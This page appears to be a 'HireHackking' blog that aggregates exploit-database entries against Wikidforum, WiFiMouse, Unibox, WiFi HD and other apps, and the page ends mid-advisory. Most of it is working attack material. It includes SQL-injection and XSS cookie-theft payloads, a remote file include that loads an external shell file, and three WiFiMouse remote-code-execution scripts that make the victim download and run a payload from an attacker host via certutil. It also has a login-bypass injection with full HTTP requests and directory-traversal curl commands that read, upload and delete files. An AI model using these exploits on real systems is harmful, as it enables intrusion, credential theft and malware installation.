Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863151861

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/52425/info

Wikidforum is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.

Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Wikidforum 2.10 is vulnerable; other versions may also be affected. 


Search-Field -> Advanced Search -> POST-Parameter 'select_sort' -> [sql-injection]
Search-Field -> Advanced Search -> POST-Parameter 'opt_search_select' -> [sql-injection]
HireHackking 
source: https://www.securityfocus.com/bid/52425/info
  
Wikidforum is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
  
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
  
Wikidforum 2.10 is vulnerable; other versions may also be affected. 

Search-Field -> Advanced Search -> Author -> '"</script><script>alert(document.cookie)</script>
Search-Field -> Advanced Search -> POST-Parameter 'select_sort' -> ><iMg src=N onerror=alert(document.cookie)>
HireHackking 
source: https://www.securityfocus.com/bid/55387/info

Wiki Web Help is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue could allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Wiki Web Help 0.3.11 is vulnerable; other versions may also be affected. 

http://www.example.com/wwh/pages/links.php?configpath=http://www.example2.com/shell.txt?
HireHackking 
[+] Title: wifirxpower - Local Stack Based Buffer Overflow
[+] Credits / Discovery: Nassim Asrir
[+] Author Email: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
[+] Author Company: Henceforth
[+] CVE: N/A

Vendor:
===============

https://github.com/cnlohr/wifirxpower
  
 
Download:
===========

https://github.com/cnlohr/wifirxpower
 
 
Vulnerability Type:
===================

Local Stack Based Buffer Overflow


issue:
===================

'wifirx.c' contain a vulnerable code in the line '111' the developer use the 'strcpy' function and does not check the buffer destination and cause a Stack Oveflow. 
 
Vulnerable Code (102 - 124) wifirx.c:
===================
int GetQuality( const char * interface, int * noise )
{
	int sockfd;
	struct iw_statistics stats;
	struct iwreq req;


	memset(&stats, 0, sizeof(stats));
	memset(&req, 0, sizeof(struct iwreq));
	strcpy( req.ifr_name, interface );
	req.u.data.pointer = &stats;
	req.u.data.length = sizeof(struct iw_statistics);
#ifdef CLEAR_UPDATED
	req.u.data.flags = 1;
#endif

	/* Any old socket will do, and a datagram socket is pretty cheap */
	if((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) == -1) {
		if( first ) perror("Could not create simple datagram socket");
		first = 0;
		//exit(EXIT_FAILURE);
		return -1;
	}
 

Exploit:
=========

1 - ./wifirx aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

2 - r $(python -c 'print"A"*41')

Backtrace: 
=========
/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7ffff6ec3e37]
/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x0)[0x7ffff6ec3e00]
/home/bugtraq/Desktop/wifirxpower-master/wifirx[0x401aaa]
/home/bugtraq/Desktop/wifirxpower-master/wifirx[0x401d21]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xed)[0x7ffff6ddb7ed]
/home/bugtraq/Desktop/wifirxpower-master/wifirx[0x401449]

Memory Map:
===========
00606000-0062a000 rw-p 00000000 00:00 0                                  [heap]
7ffff6379000-7ffff638e000 r-xp 00000000 08:01 7606631                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff638e000-7ffff658d000 ---p 00015000 08:01 7606631                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff658d000-7ffff658e000 r--p 00014000 08:01 7606631                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff658e000-7ffff658f000 rw-p 00015000 08:01 7606631                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff658f000-7ffff6594000 r-xp 00000000 08:01 3027725                    /usr/lib/x86_64-linux-gnu/libXdmcp.so.6.0.0
7ffff6594000-7ffff6793000 ---p 00005000 08:01 3027725                    /usr/lib/x86_64-linux-gnu/libXdmcp.so.6.0.0
7ffff6793000-7ffff6794000 r--p 00004000 08:01 3027725                    /usr/lib/x86_64-linux-gnu/libXdmcp.so.6.0.0
7ffff6794000-7ffff6795000 rw-p 00005000 08:01 3027725                    /usr/lib/x86_64-linux-gnu/libXdmcp.so.6.0.0
7ffff6795000-7ffff6797000 r-xp 00000000 08:01 3027706                    /usr/lib/x86_64-linux-gnu/libXau.so.6.0.0
7ffff6797000-7ffff6996000 ---p 00002000 08:01 3027706                    /usr/lib/x86_64-linux-gnu/libXau.so.6.0.0
7ffff6996000-7ffff6997000 r--p 00001000 08:01 3027706                    /usr/lib/x86_64-linux-gnu/libXau.so.6.0.0
7ffff6997000-7ffff6998000 rw-p 00002000 08:01 3027706                    /usr/lib/x86_64-linux-gnu/libXau.so.6.0.0
7ffff6998000-7ffff699a000 r-xp 00000000 08:01 7602253                    /lib/x86_64-linux-gnu/libdl-2.15.so
7ffff699a000-7ffff6b9a000 ---p 00002000 08:01 7602253                    /lib/x86_64-linux-gnu/libdl-2.15.so
7ffff6b9a000-7ffff6b9b000 r--p 00002000 08:01 7602253                    /lib/x86_64-linux-gnu/libdl-2.15.so
7ffff6b9b000-7ffff6b9c000 rw-p 00003000 08:01 7602253                    /lib/x86_64-linux-gnu/libdl-2.15.so
7ffff6b9c000-7ffff6bb9000 r-xp 00000000 08:01 3015326                    /usr/lib/x86_64-linux-gnu/libxcb.so.1.1.0
7ffff6bb9000-7ffff6db8000 ---p 0001d000 08:01 3015326                    /usr/lib/x86_64-linux-gnu/libxcb.so.1.1.0
7ffff6db8000-7ffff6db9000 r--p 0001c000 08:01 3015326                    /usr/lib/x86_64-linux-gnu/libxcb.so.1.1.0
7ffff6db9000-7ffff6dba000 rw-p 0001d000 08:01 3015326                    /usr/lib/x86_64-linux-gnu/libxcb.so.1.1.0
7ffff6dba000-7ffff6f6e000 r-xp 00000000 08:01 7606751                    /lib/x86_64-linux-gnu/libc-2.15.so
7ffff6f6e000-7ffff716d000 ---p 001b4000 08:01 7606751                    /lib/x86_64-linux-gnu/libc-2.15.so
7ffff716d000-7ffff7171000 r--p 001b3000 08:01 7606751                    /lib/x86_64-linux-gnu/libc-2.15.so
7ffff7171000-7ffff7173000 rw-p 001b7000 08:01 7606751                    /lib/x86_64-linux-gnu/libc-2.15.so
7ffff7173000-7ffff7178000 rw-p 00000000 00:00 0 
7ffff7178000-7ffff7188000 r-xp 00000000 08:01 3022902                    /usr/lib/x86_64-linux-gnu/libXext.so.6.4.0
7ffff7188000-7ffff7387000 ---p 00010000 08:01 3022902                    /usr/lib/x86_64-linux-gnu/libXext.so.6.4.0
7ffff7387000-7ffff7388000 r--p 0000f000 08:01 3022902                    /usr/lib/x86_64-linux-gnu/libXext.so.6.4.0
7ffff7388000-7ffff7389000 rw-p 00010000 08:01 3022902                    /usr/lib/x86_64-linux-gnu/libXext.so.6.4.0
7ffff7389000-7ffff738b000 r-xp 00000000 08:01 3022982                    /usr/lib/x86_64-linux-gnu/libXinerama.so.1.0.0
7ffff738b000-7ffff758a000 ---p 00002000 08:01 3022982                    /usr/lib/x86_64-linux-gnu/libXinerama.so.1.0.0
7ffff758a000-7ffff758b000 r--p 00001000 08:01 3022982                    /usr/lib/x86_64-linux-gnu/libXinerama.so.1.0.0
7ffff758b000-7ffff758c000 rw-p 00002000 08:01 3022982                    /usr/lib/x86_64-linux-gnu/libXinerama.so.1.0.0
7ffff758c000-7ffff75a4000 r-xp 00000000 08:01 7606754                    /lib/x86_64-linux-gnu/libpthread-2.15.so
7ffff75a4000-7ffff77a3000 ---p 00018000 08:01 7606754                    /lib/x86_64-linux-gnu/libpthread-2.15.so
7ffff77a3000-7ffff77a4000 r--p 00017000 08:01 7606754                    /lib/x86_64-linux-gnu/libpthread-2.15.so
7ffff77a4000-7ffff77a5000 rw-p 00018000 08:01 7606754                    /lib/x86_64-linux-gnu/libpthread-2.15.so
7ffff77a5000-7ffff77a9000 rw-p 00000000 00:00 0 
7ffff77a9000-7ffff78a4000 r-xp 00000000 08:01 7606762                    /lib/x86_64-linux-gnu/libm-2.15.so
7ffff78a4000-7ffff7aa3000 ---p 000fb000 08:01 7606762                    /lib/x86_64-linux-gnu/libm-2.15.so
7ffff7aa3000-7ffff7aa4000 r--p 000fa000 08:01 7606762                    /lib/x86_64-linux-gnu/libm-2.15.so
7ffff7aa4000-7ffff7aa5000 rw-p 000fb000 08:01 7606762                    /lib/x86_64-linux-gnu/libm-2.15.so
7ffff7aa5000-7ffff7bd5000 r-xp 00000000 08:01 3015330                    /usr/lib/x86_64-linux-gnu/libX11.so.6.3.0
7ffff7bd5000-7ffff7dd5000 ---p 00130000 08:01 3015330                    /usr/lib/x86_64-linux-gnu/libX11.so.6.3.0
7ffff7dd5000-7ffff7dd6000 r--p 00130000 08:01 3015330                    /usr/lib/x86_64-linux-gnu/libX11.so.6.3.0
7ffff7dd6000-7ffff7dda000 rw-p 00131000 08:01 3015330                    /usr/lib/x86_64-linux-gnu/libX11.so.6.3.0
7ffff7dda000-7ffff7dfc000 r-xp 00000000 08:01 7606759                    /lib/x86_64-linux-gnu/ld-2.15.so
7ffff7fd5000-7ffff7fdb000 rw-p 00000000 00:00 0 
7ffff7ff7000-7ffff7ffb000 rw-p 00000000 00:00 0 
7ffff7ffb000-7ffff7ffc000 r-xp 00000000 00:00 0                          [vdso]
7ffff7ffc000-7ffff7ffd000 r--p 00022000 08:01 7606759                    /lib/x86_64-linux-gnu/ld-2.15.so
7ffff7ffd000-7ffff7fff000 rw-p 00023000 08:01 7606759                    /lib/x86_64-linux-gnu/ld-2.15.so
7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0                          [stack]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]

 
Tested on:
=============== 

Linux Ubuntu x86_64
HireHackking 
# Exploit Title: WiFiMouse 1.8.3.4 - Remote Code Execution (RCE)
# Date: 15-08-2022
# Author: Febin
# Vendor Homepage: http://necta.us/
# Software Link: http://wifimouse.necta.us/#download
# Version: 1.8.3.4
# Tested on: Windows 10

#!/bin/bash
printf "
  WiFiMouse / MouseServer 1.8.3.4 Exploit
        
            by FEBIN

"

printf "[*] Enter the Target IP Address: "
read TARGET



rce(){
printf "[*] Enter the Command to execute on the Target:  "
read CMD

sh -c "echo 'key  9[R] WIN d';sleep 1;echo 'key  9[R] WIN u';sleep 1;echo 'utf8 cmd /c $CMD';sleep 1;echo 'key 9[R] RTN u'" | socat - TCP4:$TARGET:1978
}

dirlist(){

echo "[*] User's Home Directory Contents:"

echo 'fileexplorer ~/' | nc $TARGET 1978 | strings | cut -b 2-

while $true
do
printf "\nList Directory:> "
read DIR
echo "[+] Contents of $DIR: "
echo "fileexplorer ~/$DIR" | nc $TARGET 1978 | strings | cut -b 2-
done


}

printf "
 [1] Remote Command Execution
 [2] Directory Listing
 
 "
printf "Enter Your Choice (1 or 2) : "
read CHOICE

if [[ $CHOICE == "1" ]]
then
rce
elif [[ $CHOICE == "2" ]]
then
dirlist

else
echo "[-] Invalid Choice!"
fi
HireHackking 
# Exploit Title: WifiHotSpot 1.0.0.0 - 'WifiHotSpotService.exe' Unquoted Service Path
# Discovery by: Erick Galindo 
# Discovery Date: 2020-05-06
# Vendor Homepage: https://www.gearboxcomputers.com/downloads/wifihotspot.exe
# Tested Version: 1.0.0.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro  x64 es
# Step to discover Unquoted Service Path:
 
c:\wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
MainService     WifiHotSpotSvc      C:\Program Files (x86)\WifiHotSpot\WifiHotSpotService.exe                          Auto

# Service info
sc qc wifihotspotsvc
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: wifihotspotsvc
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\WifiHotSpot\WifiHotSpotService.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : MainService
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem 
 
#Exploit:

This vulnerability could permit executing code during startup or reboot with the escalated privileges.
HireHackking 
# Exploit Title: Wifi Soft Unibox Administration 3.0 & 3.1 Login Page - Sql Injection
# Google Dork: intext:"Unibox Administration 3.1", intext:"Unibox 3.0"
# Date: 07/2023
# Exploit Author: Ansh Jain @sudoark
# Author  Contact : arkinux01@gmail.com
# Vendor Homepage: https://www.wifi-soft.com/
# Software Link:
https://www.wifi-soft.com/products/unibox-hotspot-controller.php
# Version: Unibox Administration 3.0 & 3.1
# Tested on: Microsoft Windows 11
# CVE : CVE-2023-34635
# CVE URL : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34635

The Wifi Soft Unibox Administration 3.0 and 3.1 Login Page is vulnerable to
SQL Injection, which can lead to unauthorised admin access for attackers.
The vulnerability occurs because of not validating or sanitising the user
input in the username field of the login page and directly sending the
input to the backend server and database.

## How to Reproduce
Step 1 : Visit the login page and check the version, whether it is 3.0,
3.1, or not.
Step 2 : Add this payload " 'or 1=1 limit 1-- - " to the username field and
enter any random password.
Step 3 : Fill in the captcha and hit login. After hitting login, you have
been successfully logged in as an administrator and can see anyone's user
data, modify data, revoke access, etc.


--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### Login Request
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

-----------------------------------------------------------------------------------------------------------------------
Parameters: username, password, captcha, action
-----------------------------------------------------------------------------------------------------------------------

POST /index.php HTTP/2
Host: 255.255.255.255.host.com
Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
Firefox/102.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
Origin: https://255.255.255.255.host.com
Referer: https://255.255.255.255.host.com/index.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

username='or+1=1+limit+1--+-&password=randompassword&captcha=69199&action=Login

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### Login Response
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

HTTP/2 302 Found
Server: nginx
Date: Tue, 18 Jul 2023 13:32:14 GMT
Content-Type: text/html; charset=UTF-8
Location: ./dashboard/dashboard
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### Successful Loggedin Request
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

GET /dashboard/dashboard HTTP/2
Host: 255.255.255.255.host.com
Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
Firefox/102.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://255.255.255.255.host.com/index.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### Successful Loggedin Response
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

HTTP/2 200 OK
Server: nginx
Date: Tue, 18 Jul 2023 13:32:43 GMT
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache_control: private


<!DOCTYPE html>
<html lang="en">
html content
</html>
HireHackking 
# Exploit Title: WiFi Mouse 1.8.3.2 - Remote Code Execution (RCE)
# Date: 13-10-2022
# Author: Payal
# Vendor Homepage: http://necta.us/
# Software Link: http://wifimouse.necta.us/#download
# Version: 1.8.3.2
# Tested on: Windows 10 Pro Build 21H2

# Desktop Server software used by mobile app has PIN option which does not to prevent command input.# Connection response will be 'needpassword' which is only interpreted by mobile app and prompts for PIN input.
#!/usr/bin/env python3
from socket import socket, AF_INET, SOCK_STREAMfrom time import
sleepimport sysimport string

target = socket(AF_INET, SOCK_STREAM)
port = 1978
try:
	rhost = sys.argv[1]
	lhost = sys.argv[2]
	payload = sys.argv[3]except:
	print("USAGE: python " + sys.argv[0]+ " <target-ip>
<local-http-server-ip> <payload-name>")
	exit()


characters={
	"A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e",
	"O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a",
	"a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e",
	"o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a",
	"1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30",
	" ":"20","+":"2b","=":"3d","/":"2f","_":"5f","<":"3c",
	">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a",
	"(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e",
	"\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"}

def openCMD():
	target.sendto(bytes.fromhex("6f70656e66696c65202f432f57696e646f77732f53797374656d33322f636d642e6578650a"),
(rhost,port)) # openfile /C/Windows/System32/cmd.exe
def SendString(string):
	for char in string:
		target.sendto(bytes.fromhex("7574663820" + characters[char] +
"0a"),(rhost,port)) # Sends Character hex with packet padding
		sleep(0.03)
def SendReturn():
	target.sendto(bytes.fromhex("6b657920203352544e"),(rhost,port)) #
'key 3RTN' - Similar to 'Remote Mouse' mobile app
	sleep(0.5)
def exploit():
	print("[+] 3..2..1..")
	sleep(2)
	openCMD()
	print("[+] *Super fast hacker typing*")
	sleep(1)
	SendString("certutil.exe -urlcache -f http://" + lhost + "/" +
payload + " C:\\Windows\\Temp\\" + payload)
	SendReturn()
	print("[+] Retrieving payload")
	sleep(3)
	SendString("C:\\Windows\\Temp\\" + payload)
	SendReturn()
	print("[+] Done! Check Your Listener?")

def main():
	target.connect((rhost,port))
	exploit()
	target.close()
	exit()
if __name__=="__main__":
	main()
HireHackking 
# Exploit Title: WiFi Mouse 1.7.8.5 - Remote Code Execution
# Date: 25-02-2021
# Author: H4rk3nz0
# Vendor Homepage: http://necta.us/
# Software Link: http://wifimouse.necta.us/#download
# Version: 1.7.8.5
# Tested on: Windows Enterprise Build 17763

# Python 3 port done by RedHatAugust
# Original exploit: https://www.exploit-db.com/exploits/49601
# Tested on: Windows 10 Pro Build 15063

# Desktop Server software used by mobile app has PIN option which does not to prevent command input.
# Connection response will be 'needpassword' which is only interpreted by mobile app and prompts for PIN input.

#!/usr/bin/env python3

from socket import socket, AF_INET, SOCK_STREAM
from time import sleep
import sys
import string

target = socket(AF_INET, SOCK_STREAM)
port = 1978

try:
	rhost = sys.argv[1]
	lhost = sys.argv[2]
	payload = sys.argv[3]
except:
	print("USAGE: python " + sys.argv[0]+ " <target-ip> <local-http-server-ip> <payload-name>")
	exit()


characters={
	"A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e",
	"O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a",
	"a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e",
	"o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a",
	"1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30",
	" ":"20","+":"2b","=":"3d","/":"2f","_":"5f","<":"3c",
	">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a",
	"(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e",
	"\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"}


def openCMD():
	target.sendto(bytes.fromhex("6f70656e66696c65202f432f57696e646f77732f53797374656d33322f636d642e6578650a"), (rhost,port)) # openfile /C/Windows/System32/cmd.exe

def SendString(string):
	for char in string:
		target.sendto(bytes.fromhex("7574663820" + characters[char] + "0a"),(rhost,port)) # Sends Character hex with packet padding
		sleep(0.03)

def SendReturn():
	target.sendto(bytes.fromhex("6b657920203352544e"),(rhost,port)) # 'key 3RTN' - Similar to 'Remote Mouse' mobile app
	sleep(0.5)

def exploit():
	print("[+] 3..2..1..")
	sleep(2)
	openCMD()
	print("[+] *Super fast hacker typing*")
	sleep(1)
	SendString("certutil.exe -urlcache -f http://" + lhost + "/" + payload + " C:\\Windows\\Temp\\" + payload)
	SendReturn()
	print("[+] Retrieving payload")
	sleep(3)
	SendString("C:\\Windows\\Temp\\" + payload)
	SendReturn()
	print("[+] Done! Check Your Listener?")


def main():
	target.connect((rhost,port))
	exploit()
	target.close()
	exit()

if __name__=="__main__":
	main()
HireHackking 
# Exploit Title: WiFi Mouse 1.7.8.5 - Remote Code Execution
# Date: 25-02-2021
# Author: H4rk3nz0
# Vendor Homepage: http://necta.us/
# Software Link: http://wifimouse.necta.us/#download
# Version: 1.7.8.5
# Tested on: Windows Enterprise Build 17763

# Desktop Server software used by mobile app has PIN option which does not to prevent command input.
# Connection response will be 'needpassword' which is only interpreted by mobile app and prompts for PIN input.

#!/usr/bin/python

from socket import socket, AF_INET, SOCK_STREAM
from time import sleep
import sys
import string

target = socket(AF_INET, SOCK_STREAM)
port = 1978

try:
	rhost = sys.argv[1]
	lhost = sys.argv[2]
	payload = sys.argv[3]
except:
	print("USAGE: python " + sys.argv[0]+ " <target-ip> <local-http-server-ip> <payload-name>")
	exit()


characters={
	"A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e",
	"O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a",
	"a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e",
	"o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a",
	"1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30",
	" ":"20","+":"2b","=":"3d","/":"2f","_":"5f","<":"3c",
	">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a",
	"(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e",
	"\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"}


def openCMD():
	target.sendto("6f70656e66696c65202f432f57696e646f77732f53797374656d33322f636d642e6578650a".decode("hex"), (rhost,port)) # openfile /C/Windows/System32/cmd.exe

def SendString(string):
	for char in string:
		target.sendto(("7574663820" + characters[char] + "0a").decode("hex"),(rhost,port)) # Sends Character hex with packet padding
		sleep(0.03)

def SendReturn():
	target.sendto("6b657920203352544e".decode("hex"),(rhost,port)) # 'key 3RTN' - Similar to 'Remote Mouse' mobile app
	sleep(0.5)

def exploit():
	print("[+] 3..2..1..")
	sleep(2)
	openCMD()
	print("[+] *Super fast hacker typing*")
	sleep(1)
	SendString("certutil.exe -urlcache -f http://" + lhost + "/" + payload + " C:\\Windows\\Temp\\" + payload)
	SendReturn()
	print("[+] Retrieving payload")
	sleep(3)
	SendString("C:\\Windows\\Temp\\" + payload)
	SendReturn()
	print("[+] Done! Check Your Listener?")


def main():
	target.connect((rhost,port))
	exploit()
	target.close()
	exit()

if __name__=="__main__":
	main()
HireHackking 
# Exploit Title: Wifi HD Wireless Disk Drive 11 - Local File Inclusion
# Date: Aug 13, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: http://www.savysoda.com
# Software Link: https://apps.apple.com/us/app/wifi-hd-wireless-disk-drive/id311170976
# Version: 11
# Tested on: iPhone OS 15_5

# Proof of Concept
GET /../../../../../../../../../../../../../../../../etc/hosts HTTP/1.1
Host: 192.168.1.100
Connection: close
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X)
AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5  Safari/604.1
Referer: http://192.168.1.103/
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate


-----------------

HTTP/1.1 200 OK
Content-Disposition: attachment
Content-Type: application/download
Content-Length: 213
Accept-Ranges: bytes
Date: Sat, 13 Aug 2022 03:33:30 GMT

##
# Host Database
#
# localhost is used to configure the loopback interface
# when the system is booting.  Do not change this entry.
##
127.0.0.1 localhost
255.255.255.255 broadcasthost
::1             localhost
HireHackking 
# Exploit Title: WiFi HD 8.1 - Directory Traversal and Denial of Service
# Date: 2015-05-27
# Exploit Author: Wh1t3Rh1n0 (Michael Allen)
# Vendor Homepage: http://www.savysoda.com
# Software Link: http://www.savysoda.com/WiFiHD/
# Version: 8.1 (Apr 1, 2015)
# Tested on: iPhone

Disclosure Timeline:
* 2015-05-30: Vendor notified via email.
* 2015-06-05: No reponse from the vendor. Advisory released.


Software description:
=====================
WiFi HD is an iOS app which allows users to share files between their iPhone and PC by running a web server, FTP server, or SMB server on the iPhone or through various cloud services. 


Vulnerabilities:
================
The web server (titled "WiFi" in the app) is vulnerable to multiple directory traversal issues which allow an attacker to download, upload, create, or delete any file to which the app has access. The SMB server (titled "Shared Folder") is vulnerable to a Denial of Service attack when issued the command, "dir -c", within smbclient. It also discloses a listing of all readable files within the iPhone's file system via the IPC$ share.


Web Server Proof-of-Concept
===========================
Read arbitrary files/folders:
    Read /etc/passwd:
        curl "http://[TARGET IP]/../../../../../../../../etc/passwd"
    List contents of the /tmp directory:
        curl "http://[TARGET IP]/../../../../../../../../tmp/"

Create Folders:
    Create the folder, "/tmp/PoC-Folder":
        curl -d 'foldername=/../../../../../../../../tmp/PoC-Folder&button=Create+Folder' "http://[TARGET IP]/"
    
Delete Files/Folders:
    Delete the folder, "/tmp/PoC-Folder":
        curl 'http://[TARGET IP]/!DEL!/../../../../../../../../tmp/PoC-Folder'
                                  
Upload a File:
    Upload /etc/services to /tmp/example.txt:
        curl -F 'file=@/etc/services;filename=/../../../../../../../../tmp/example.txt' -F 'button=Submit' 'http://[TARGET IP]/'

    
SMB Server Proof-of-Concept
===========================
Denial of Service:
    smbclient -N -c 'dir \' //[TARGET IP]/IPC$
    
Browse the iPhone's Filesystem:
    smbclient -N //[TARGET IP]/IPC$
HireHackking 
Document Title:
===============
Wifi Drive Pro v1.2 iOS - File Include Web Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1447


Release Date:
=============
2015-03-13


Vulnerability Laboratory ID (VL-ID):
====================================
1447


Common Vulnerability Scoring System:
====================================
6.3


Product & Service Introduction:
===============================
This app lets you use your iphone, iPad or iPod Touch as a wireless USB drive through which you can download, save and view documents and files.
Using the app you can transfer files from your PC or Mac either wirelessly or through a USB port and carry your files wherever you go.

(Copy of the Vendor Homepage: https://itunes.apple.com/en/app/wifi-drive-pro/id579582610 )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered file include web vulnerability in the official Wifi Drive Pro v1.2 iOS mobile application.


Vulnerability Disclosure Timeline:
==================================
2015-03-13: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Mindspeak Software
Product: Wifi Drive Pro - iOS Mobile Web Application 1.2


Exploitation Technique:
=======================
Local


Severity Level:
===============
High


Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official Mindspeak Software - Wifi Drive Pro v1.2 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands 
to compromise the mobile web-application.

The web vulnerability is located in the `filename` value of the `file upload` module. Remote attackers are able to inject own files with malicious 
